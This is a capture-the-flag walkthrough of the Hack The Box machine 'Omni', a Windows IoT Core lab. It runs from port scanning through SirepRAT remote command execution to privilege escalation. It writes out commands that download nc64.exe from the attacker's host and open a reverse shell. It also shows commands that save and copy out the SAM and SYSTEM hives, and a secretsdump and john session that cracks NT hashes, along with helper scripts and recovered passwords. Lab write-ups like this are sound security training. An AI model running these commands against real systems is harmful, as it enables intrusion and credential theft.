Omni

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions behind them.

The following nmap command scans the full port range of the target quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.204 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

# Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans only those ports, in more depth, and saves the result into a file:

nmap -sC -sV -p135,5985,8080,29817,29819,29820 10.10.10.204 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Jun 16 14:09:33 2022 as: nmap -sCV -p135,5985,8080,29817,29819,29820 -oN targeted 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.038s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=6/16%Time=62AB1D85%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 16 14:10:48 2022 -- 1 IP address (1 host up) scanned in 75.72 seconds
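The two-stage scan above (a full-range sweep, then -sCV on the open ports only) is easy to glue together. The following is an added example and not part of the original write-up: it parses the -oN output of the first scan, checks that the whole 1-65535 range was accounted for (a truncated or rate-limited sweep silently hides ports), and builds the second-stage command. The allPorts output embedded in it is copied from this page; the function names are my own.

```python
import re

# Added example (not from the original write-up): glue for the two-stage
# nmap workflow. Parse the -oN file of the full sweep, sanity-check that the
# sweep covered every port, and build the -sCV command for the open ports.

FULL_RANGE = 65535

# Copied from the allPorts output on this page.
ALLPORTS_OUTPUT = """\
# Nmap 7.92 scan initiated Thu Jun 16 14:08:04 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.044s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

# Nmap done at Thu Jun 16 14:08:30 2022 -- 1 IP address (1 host up) scanned in 26.61 seconds
"""

_PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)
_NOT_SHOWN = re.compile(r"^Not shown: (.*)$", re.M)
# "65529 filtered tcp ports", "998 closed ports", "3 open|filtered udp ports"
_HIDDEN_COUNT = re.compile(r"(\d+)\s+[a-z|]+\s+(?:tcp |udp )?ports")


def parse_nmap_normal(text):
    """{(port, proto): (state, service)} for every port line in -oN output."""
    return {(int(p), proto): (state, svc)
            for p, proto, state, svc in _PORT_LINE.findall(text)}


def open_ports(text, proto="tcp"):
    """Ports nmap listed as open (open|filtered included), sorted."""
    return sorted(p for (p, pr), (state, _) in parse_nmap_normal(text).items()
                  if pr == proto and state.startswith("open"))


def accounted_ports(text):
    """Listed ports plus the 'Not shown' count; 65535 means a -p- sweep completed."""
    m = _NOT_SHOWN.search(text)
    hidden = sum(int(n) for n in _HIDDEN_COUNT.findall(m.group(1))) if m else 0
    return hidden + len(parse_nmap_normal(text))


def targeted_scan_cmd(text, target, outfile="targeted", expect_full_range=True):
    """Second-stage command: default scripts + version detection on the open ports only."""
    if expect_full_range and accounted_ports(text) != FULL_RANGE:
        raise ValueError("first-stage output does not cover the full port range; rerun the sweep")
    ports = open_ports(text)
    if not ports:
        raise ValueError("no open TCP ports found; check -Pn and firewalling before moving on")
    return f"nmap -sCV -p{','.join(map(str, ports))} -oN {outfile} {target}"


if __name__ == "__main__":
    print(targeted_scan_cmd(ALLPORTS_OUTPUT, "10.10.10.204"))
```

Set expect_full_range=False when the first stage was not a -p- sweep (for example a top-1000 scan), otherwise the check correctly refuses to build a command from incomplete coverage.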

If we browse to port 8080, we are asked for credentials that we don't have.

Let's fingerprint the site with the whatweb tool.

whatweb http://10.10.10.204:8080

http://10.10.10.204:8080 [401 Unauthorized] Cookies[CSRF-Token], Country[RESERVED][ZZ], HTTPServer[Microsoft-HTTPAPI/2.0], IP[10.10.10.204], Microsoft-HTTPAPI[2.0], WWW-Authenticate[Windows Device Portal][Basic]

Exploitation

If we take a look at the whatweb result, we'll see that the authentication realm is Windows Device Portal, the web management interface of Windows 10 IoT Core. That also explains the three unidentified high ports: 29817, 29819 and 29820 belong to the Sirep Test Service that ships on Windows IoT Core images, which accepts commands without any authentication and runs them as SYSTEM. At this point, I started looking for common exploits associated with that feature and found SirepRAT, a tool published by SafeBreach Labs on GitHub. Download and install it with the following commands.

git clone https://github.com/SafeBreach-Labs/SirepRAT

cd SirepRAT/

pip3 install -r requirements.txt

python3 setup.py install

SirepRAT lets us, among other things, execute commands on the victim machine. To get a reverse shell, we'll transfer the nc64.exe binary to the Omni machine. First, start a simple HTTP server with Python in the directory where nc64.exe is located.

python -m http.server 80

Then, run SirepRAT so that the target downloads nc64.exe with PowerShell's Invoke-WebRequest (iwr) and saves it in C:\Windows\System32\spool\drivers\color\, a directory that is writable by standard users and covered by the default AppLocker allow rules, so a binary dropped there can run even when AppLocker is enforced.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args "/c iwr -uri http://10.10.14.9/nc64.exe -outfile C:\Windows\System32\spool\drivers\color\nc64.exe"

  • --return_output have the target device return the command's output stream.

  • --cmd program to execute.

  • --args argument string for the program.

Once we transfer the nc64.exe binary to the victim machine, let's set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, let's execute the nc64.exe binary through SirepRAT so that it sends us a reverse shell.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\spool\drivers\color\nc64.exe -e cmd 10.10.14.9 4444'

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49671
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Privilege Escalation

We'll see that the whoami command is not available, but we can still find out who we are from the value of the %username% variable.

echo %username%

omni$

The name is the host name followed by $, which is how the machine account shows up: the Sirep service is running our commands as SYSTEM.

We could also see the users on the system.

net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            app                      DefaultAccount           
DevToolsUser             Guest                    sshd                     
WDAGUtilityAccount       
The command completed with one or more errors.

Now, let's go to the root directory and find the user and root flags recursively.

dir /s user.txt root.txt

  • /s enumerate directories and subdirectories.

 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\Data\Users\administrator

07/04/2020  09:48 PM             1,958 root.txt
               1 File(s)          1,958 bytes

 Directory of C:\Data\Users\app

07/04/2020  09:53 PM             1,958 user.txt
               1 File(s)          1,958 bytes

     Total Files Listed:
               2 File(s)          3,916 bytes
               0 Dir(s)     584,065,024 bytes free

If we try to view the flags, we'll see that they are not plain text: each one is a PowerShell CliXml export (Export-Clixml) of a PSCredential object, with the flag stored as an encrypted SecureString.

type C:\Data\Users\administrator\root.txt C:\Data\Users\app\user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
C:\Data\Users\app\user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
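The format above is what Export-Clixml produces for a PSCredential. The following is an added example and not from the original write-up: it parses such a file and checks whether the <SS> payload is a user-scoped DPAPI blob, which tells you which account you must be running as to decrypt it. The sample XML is constructed in the page's layout with a dummy payload (the real values are not reproduced here), and the function names are my own.

```python
import xml.etree.ElementTree as ET

# Added example, not from the original write-up: triage PSCredential files
# produced by Export-Clixml. Without -Key, ConvertFrom-SecureString wraps
# the secret in a DPAPI blob (CryptProtectData, user scope) and stores it as
# hex in the <SS> element, so only the exporting user, on the same machine,
# can decrypt it. Function names are my own.

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
PSCREDENTIAL = "System.Management.Automation.PSCredential"

# A DPAPI blob starts with version 1 and the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its on-disk (little-endian) layout.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# Constructed sample in the layout shown on this page. The payload is the
# DPAPI header followed by dummy zero bytes, not a real ciphertext.
SAMPLE_SS = DPAPI_HEADER.hex() + "00" * 32
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>{PSCREDENTIAL}</T>
      <T>System.Object</T>
    </TN>
    <ToString>{PSCREDENTIAL}</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">{SAMPLE_SS}</SS>
    </Props>
  </Obj>
</Objs>
"""


def parse_pscredentials(xml_text):
    """Return [(username, hex_secure_string)] for every PSCredential in a CliXml file."""
    found = []
    for obj in ET.fromstring(xml_text).iter(PS_NS + "Obj"):
        if PSCREDENTIAL not in [t.text for t in obj.iter(PS_NS + "T")]:
            continue
        user = obj.find(f"{PS_NS}Props/{PS_NS}S[@N='UserName']")
        ss = obj.find(f"{PS_NS}Props/{PS_NS}SS[@N='Password']")
        found.append(((user.text or "") if user is not None else "",
                      (ss.text or "").strip() if ss is not None else ""))
    return found


def classify_secure_string(hex_blob):
    """How the SecureString was protected, and therefore who can unprotect it."""
    try:
        raw = bytes.fromhex(hex_blob)
    except ValueError:
        return "not-hex"
    if raw.startswith(DPAPI_HEADER):
        # CryptUnprotectData only succeeds in the exporting user's context
        # (same account, same machine). SYSTEM or any other user gets
        # "Error occurred during a cryptographic operation" from Import-CliXml.
        return "dpapi-user"
    # Not a user-scoped DPAPI blob, e.g. exported with -Key/-SecureKey.
    return "other"


def triage(xml_text):
    return [(user, classify_secure_string(ss)) for user, ss in parse_pscredentials(xml_text)]


if __name__ == "__main__":
    for user, kind in triage(SAMPLE_CLIXML):
        print(f"{user}: {kind}")
```

When a file classifies as dpapi-user, the only way to read it is to run Import-CliXml as the account that created it (or to recover that account's DPAPI master key), which is exactly the obstacle the rest of this section works around.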

In order to view the real flags, we'll have to use PowerShell, and execute the following command.

powershell

(Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

Import-CliXml : Error occurred during a cryptographic operation.
At line:1 char:2
+ (Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential ...
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Import-Clixml], Cryptographic 
   Exception
    + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept 
   ion,Microsoft.PowerShell.Commands.ImportClixmlCommand

We get an error, and it is not a permissions problem. Export-Clixml protects the SecureString with DPAPI under the master key of the user who exported it, so the file can only be decrypted by that same account on that same machine; SYSTEM, which is what we are right now, is a different DPAPI identity and cannot unprotect it directly. We need to become the app user. Since we already have SYSTEM privileges, we can dump the SAM and SYSTEM registry hives and try to recover the local account passwords from them. First, create a folder called temp at the root of C:, then save both hives into it.

mkdir C:\temp

cd C:\temp

reg save HKLM\sam sam.backup

reg save HKLM\system system.backup

Now, let's transfer them to our local machine. First, start an SMB server with impacket sharing the current directory.

impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the files to the SMB share from the victim. If the copy fails because the client refuses guest access to an unauthenticated share, start smbserver with -username and -password and map the share with net use first.

copy sam.backup \\10.10.14.9\smbFolder

copy system.backup \\10.10.14.9\smbFolder

Once we have those files in our local machine, we could try to extract the hashes of the users with secretsdump.

impacket-secretsdump -system system.backup -sam sam.backup LOCAL

  • -system SYSTEM hive to parse.

  • -sam SAM hive to parse.

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...

Now, let's put those hash lines in a file called hashes and try to crack them with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes --format=NT

Using default input encoding: UTF-8
Loaded 6 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Guest)     
mesh5143         (app)     
2g 0:00:00:03 DONE (2022-06-17 00:17) 0.5181g/s 3715Kp/s 3715Kc/s 16317KC/s  _ 09..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
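To triage hashes like these without waiting for john, here is an added example that is not from the original write-up: it parses the secretsdump lines above (copied from this page), flags accounts whose NT hash is the empty-password hash, reports whether LM hashes are stored at all, and tests candidate passwords offline with a pure-Python MD4. The function names and the candidate list are my own.

```python
import struct

# Added example, not from the original write-up: NT-hash checks for
# secretsdump output. An NT hash is MD4 over the UTF-16LE password; MD4 is
# implemented here in pure Python because hashlib's md4 needs OpenSSL's
# legacy provider and is often unavailable. Function names are my own.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. LM not stored

# Copied from the secretsdump output on this page.
SECRETSDUMP_OUTPUT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
"""

# Message-word order for MD4 rounds 2 and 3 (RFC 1320).
_K2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_K3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _round(v, x, fn, order, shifts, k):
    # Each of the 16 steps updates one of a, b, c, d, cycling a, d, c, b.
    for i in range(16):
        t = (-i) % 4
        b, c, d = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
        v[t] = _rotl((v[t] + fn(b, c, d) + x[order[i]] + k) & 0xFFFFFFFF, shifts[i % 4])


def md4(msg):
    """RFC 1320 MD4 digest (16 bytes)."""
    msg = bytes(msg)
    bit_len = len(msg) * 8
    # Pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        _round(v, x, lambda b, c, d: (b & c) | (~b & d), range(16), (3, 7, 11, 19), 0)
        _round(v, x, lambda b, c, d: (b & c) | (b & d) | (c & d), _K2, (3, 5, 9, 13), 0x5A827999)
        _round(v, x, lambda b, c, d: b ^ c ^ d, _K3, (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(s + w) & 0xFFFFFFFF for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash: MD4 over the UTF-16LE encoding of the password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(text):
    """user:rid:lmhash:nthash::: lines -> list of dicts; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def blank_password_accounts(entries):
    """Accounts whose NT hash equals the hash of the empty string."""
    empty_nt = nt_hash("")
    return [e["user"] for e in entries if e["nt"] == empty_nt]


def lm_hashes_stored(entries):
    """True if any account still has a real (crackable in seconds) LM hash."""
    return any(e["lm"] != EMPTY_LM for e in entries)


def crack(entries, candidates):
    """Offline check of candidate passwords against every NT hash in one pass."""
    table = {nt_hash(c): c for c in candidates}
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


if __name__ == "__main__":
    found = parse_secretsdump(SECRETSDUMP_OUTPUT)
    print("blank passwords:", blank_password_accounts(found))
    print("LM stored:", lm_hashes_stored(found))
    print("cracked:", crack(found, ["", "password", "mesh5143"]))
```

The "Loaded 6 password hashes" line from john is explained by this parsing: seven accounts, but Guest and DefaultAccount share the empty-password hash 31d6cfe0d16ae931b73c59d7e0c089c0, and the identical LM field on every line shows LM storage is disabled.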

And we get the password mesh5143 for the app user. Let's try it against Windows Device Portal on port 8080 with the user app.

And we get in.

From the Processes section (Run command), we can execute commands, this time as the app user rather than as SYSTEM.

Now, let's start another netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then, from the Run command box, launch the same nc64.exe reverse shell command we used with SirepRAT; this time it connects back as the app user.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

At this point, we could see the user flag with the same method as before.

powershell

(Import-CliXml -Path C:\data\users\app\user.txt).GetNetworkCredential().password

7cfd50f6bc34db3204898f1505ad9d70

But now we can't decrypt the root flag: root.txt was exported by administrator, so only that account's DPAPI key can unprotect it. However, there is another file in the same format in the app home folder, iot-admin.xml, and as app we can decrypt its password.

powershell

(Import-CliXml -Path C:\data\users\app\iot-admin.xml).GetNetworkCredential().password

_1nt3rn37ofTh1nGz

Now, let's log in to Windows Device Portal again, this time as administrator with that password. Since the browser caches the Basic authentication credentials for the realm, close and reopen it so that it prompts again.

And we get in again, but as the administrator user.

Now, let's send another reverse shell from the Run command page, this time as the administrator user.

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.204] 49674
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Finally, as administrator, all we have to do is decrypt the root flag with the same method as before.

(Import-CliXml -Path C:\data\users\administrator\root.txt).GetNetworkCredential().password

5dbdce5569e2c4708617c0ce6e9bf11d
